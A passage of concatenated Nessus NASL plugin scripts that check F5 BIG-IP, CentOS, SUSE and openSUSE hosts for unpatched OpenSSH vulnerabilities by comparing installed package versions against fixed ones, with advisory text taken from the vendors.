X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions. (CVE-2016-3115)" ); script_set_attribute( attribute:"see_also", value:"https://support.f5.com/csp/article/K93532943" ); script_set_attribute( attribute:"solution", value: "Upgrade to one of the non-vulnerable versions listed in the F5 Solution K93532943." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"potential_vulnerability", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_visibility_and_reporting"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_wan_optimization_manager"); script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_webaccelerator"); script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip"); script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip_protocol_security_manager"); script_set_attribute(attribute:"patch_publication_date", value:"2016/04/27"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/21"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"F5 Networks Local Security Checks"); script_dependencies("f5_bigip_detect.nbin"); script_require_keys("Host/local_checks_enabled", "Host/BIG-IP/hotfix", "Host/BIG-IP/modules", "Host/BIG-IP/version", "Settings/ParanoidReport"); exit(0); } include("f5_func.inc"); if ( ! get_kb_item("Host/local_checks_enabled") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); version = get_kb_item("Host/BIG-IP/version"); if ( ! version ) audit(AUDIT_OS_NOT, "F5 Networks BIG-IP"); if ( isnull(get_kb_item("Host/BIG-IP/hotfix")) ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/hotfix"); if ( ! get_kb_item("Host/BIG-IP/modules") ) audit(AUDIT_KB_MISSING, "Host/BIG-IP/modules"); sol = "K93532943"; vmatrix = make_array(); if (report_paranoia < 2) audit(AUDIT_PARANOID); # AFM vmatrix["AFM"] = make_array(); vmatrix["AFM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AFM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # AM vmatrix["AM"] = make_array(); vmatrix["AM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # APM vmatrix["APM"] = make_array(); vmatrix["APM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["APM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # ASM vmatrix["ASM"] = make_array(); vmatrix["ASM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["ASM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # AVR vmatrix["AVR"] = make_array(); vmatrix["AVR"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["AVR"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # LC vmatrix["LC"] = make_array(); vmatrix["LC"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["LC"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # LTM vmatrix["LTM"] = make_array(); vmatrix["LTM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3","11.2.1","10.2.1-10.2.4"); vmatrix["LTM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); # PEM vmatrix["PEM"] = make_array(); vmatrix["PEM"]["affected" ] = make_list("12.0.0-12.1.2","11.4.0-11.6.3"); vmatrix["PEM"]["unaffected"] = make_list("14.0.0","13.0.0","12.1.3"); if (bigip_is_affected(vmatrix:vmatrix, sol:sol)) { if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get()); else security_warning(0); exit(0); } else { tested = bigip_get_tested_modules(); audit_extra = "For BIG-IP module(s) " + tested + ","; if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version); else audit(AUDIT_HOST_NOT, "running any of the affected modules"); }
NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2016-0466.NASL description Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD last seen 2020-06-01 modified 2020-06-02 plugin id 90069 published 2016-03-22 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/90069 title CentOS 6 : openssh (CESA-2016:0466) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0466 and # CentOS Errata and Security Advisory 2016:0466 respectively. # include("compat.inc"); if (description) { script_id(90069); script_version("2.8"); script_cvs_date("Date: 2020/01/02"); script_cve_id("CVE-2015-5600", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0466"); script_name(english:"CentOS 6 : openssh (CESA-2016:0466)"); script_summary(english:"Checks rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote CentOS host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) It was discovered that the OpenSSH sshd daemon did not check the list of keyboard-interactive authentication methods for duplicates. A remote attacker could use this flaw to bypass the MaxAuthTries limit, making it easier to perform password guessing attacks. (CVE-2015-5600) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); # https://lists.centos.org/pipermail/centos-announce/2016-March/021745.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?e1e33f57" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:C"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-5600"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:6"); script_set_attribute(attribute:"vuln_publication_date", value:"2015/08/03"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"CentOS Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/CentOS/release"); if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS"); os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS"); os_ver = os_ver[1]; if (! preg(pattern:"^6([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 6.x", "CentOS " + os_ver); if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu); flag = 0; if (rpm_check(release:"CentOS-6", reference:"openssh-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-askpass-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-clients-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-ldap-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"openssh-server-5.3p1-114.el6_7")) flag++; if (rpm_check(release:"CentOS-6", reference:"pam_ssh_agent_auth-0.9.3-114.el6_7")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-ldap / etc"); }
NASL family SuSE Local Security Checks NASL id SUSE_SU-2016-1386-1.NASL description This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-06-01 modified 2020-06-02 plugin id 91318 published 2016-05-25 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91318 title SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1) code # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from SUSE update advisory SUSE-SU-2016:1386-1. # The text itself is copyright (C) SUSE. # include("compat.inc"); if (description) { script_id(91318); script_version("2.11"); script_cvs_date("Date: 2019/09/11 11:22:13"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"SUSE SLED12 / SLES12 Security Update : openssh (SUSE-SU-2016:1386-1)"); script_summary(english:"Checks rpm output for the updated packages."); script_set_attribute( attribute:"synopsis", value:"The remote SUSE host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) The update package also includes non-security fixes. See advisory for details. Note that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=945484" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=945493" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=947458" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.suse.com/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2015-8325/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-1908/" ); script_set_attribute( attribute:"see_also", value:"https://www.suse.com/security/cve/CVE-2016-3115/" ); # https://www.suse.com/support/update/announcement/2016/suse-su-20161386-1/ script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?dc6c7c3f" ); script_set_attribute( attribute:"solution", value: "To install this SUSE Security Update use YaST online_update. Alternatively you can run the command listed for your product : SUSE Linux Enterprise Server 12-SP1 : zypper in -t patch SUSE-SLE-SERVER-12-SP1-2016-818=1 SUSE Linux Enterprise Server 12 : zypper in -t patch SUSE-SLE-SERVER-12-2016-818=1 SUSE Linux Enterprise Desktop 12-SP1 : zypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-818=1 SUSE Linux Enterprise Desktop 12 : zypper in -t patch SUSE-SLE-DESKTOP-12-2016-818=1 To bring your system up-to-date, use 'zypper patch'." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:suse_linux:12"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/25"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/SuSE/release", "Host/SuSE/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release !~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "SUSE"); os_ver = pregmatch(pattern: "^(SLE(S|D)\d+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "SUSE"); os_ver = os_ver[1]; if (! preg(pattern:"^(SLED12|SLES12)$", string:os_ver)) audit(AUDIT_OS_NOT, "SUSE SLED12 / SLES12", "SUSE " + os_ver); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^i[3-6]86$" && "x86_64" >!< cpu && "s390x" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "SUSE " + os_ver, cpu); sp = get_kb_item("Host/SuSE/patchlevel"); if (isnull(sp)) sp = "0"; if (os_ver == "SLES12" && (! preg(pattern:"^(0|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLES12 SP0/1", os_ver + " SP" + sp); if (os_ver == "SLED12" && (! preg(pattern:"^(0|1)$", string:sp))) audit(AUDIT_OS_NOT, "SLED12 SP0/1", os_ver + " SP" + sp); flag = 0; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-fips-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-fips-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLES12", sp:"0", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-askpass-gnome-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debuginfo-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-debugsource-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-6.6p1-42.1")) flag++; if (rpm_check(release:"SLED12", sp:"0", cpu:"x86_64", reference:"openssh-helpers-debuginfo-6.6p1-42.1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get()); else security_hole(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }
NASL family SuSE Local Security Checks NASL id OPENSUSE-2016-668.NASL description This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) These non-security issues were fixed : - Fix help output of sftp (bsc#945493) - Restarting openssh with openssh-fips installed was not working correctly (bsc#945484) - Fix crashes when /proc is not available in the chroot (bsc#947458) - Correctly parse GSSAPI KEX algorithms (bsc#961368) - More verbose FIPS mode/CC related documentation in README.FIPS (bsc#965576, bsc#960414) - Fix PRNG re-seeding (bsc#960414, bsc#729190) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option (bsc#932483, bsc#948902) This update was imported from the SUSE:SLE-12:Update update project. last seen 2020-06-05 modified 2016-06-01 plugin id 91413 published 2016-06-01 reporter This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/91413 title openSUSE Security Update : openssh (openSUSE-2016-668) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from openSUSE Security Update openSUSE-2016-668. # # The text description of this plugin is (C) SUSE LLC. # include("compat.inc"); if (description) { script_id(91413); script_version("2.6"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2015-8325", "CVE-2016-1908", "CVE-2016-3115"); script_name(english:"openSUSE Security Update : openssh (openSUSE-2016-668)"); script_summary(english:"Check for the openSUSE-2016-668 patch"); script_set_attribute( attribute:"synopsis", value:"The remote openSUSE host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update for OpenSSH fixes three security issues. These security issues were fixed : - CVE-2016-3115: Sanitise input for xauth(1) (bsc#970632) - CVE-2016-1908: Prevent X11 SECURITY circumvention when forwarding X11 connections (bsc#962313) - CVE-2015-8325: Ignore PAM environment when using login (bsc#975865) These non-security issues were fixed : - Fix help output of sftp (bsc#945493) - Restarting openssh with openssh-fips installed was not working correctly (bsc#945484) - Fix crashes when /proc is not available in the chroot (bsc#947458) - Correctly parse GSSAPI KEX algorithms (bsc#961368) - More verbose FIPS mode/CC related documentation in README.FIPS (bsc#965576, bsc#960414) - Fix PRNG re-seeding (bsc#960414, bsc#729190) - Disable DH parameters under 2048 bits by default and allow lowering the limit back to the RFC 4419 specified minimum through an option (bsc#932483, bsc#948902) This update was imported from the SUSE:SLE-12:Update update project." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=729190" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=932483" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945484" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=945493" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=947458" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=948902" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=960414" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=961368" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=962313" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=965576" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=970632" ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.opensuse.org/show_bug.cgi?id=975865" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh packages." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-askpass-gnome-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-cavs-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-debugsource"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-fips"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:novell:opensuse:openssh-helpers-debuginfo"); script_set_attribute(attribute:"cpe", value:"cpe:/o:novell:opensuse:42.1"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/31"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/01"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"SuSE Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/SuSE/release", "Host/SuSE/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/SuSE/release"); if (isnull(release) || release =~ "^(SLED|SLES)") audit(AUDIT_OS_NOT, "openSUSE"); if (release !~ "^(SUSE42\.1)$") audit(AUDIT_OS_RELEASE_NOT, "openSUSE", "42.1", release); if (!get_kb_item("Host/SuSE/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); ourarch = get_kb_item("Host/cpu"); if (!ourarch) audit(AUDIT_UNKNOWN_ARCH); if (ourarch !~ "^(i586|i686|x86_64)$") audit(AUDIT_ARCH_NOT, "i586 / i686 / x86_64", ourarch); flag = 0; if ( rpm_check(release:"SUSE42.1", reference:"openssh-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-askpass-gnome-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-cavs-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-debuginfo-6.6p1-11.1") ) flag++; if ( rpm_check(release:"SUSE42.1", reference:"openssh-debugsource-6.6p1-11.1") ) flag++; if ( 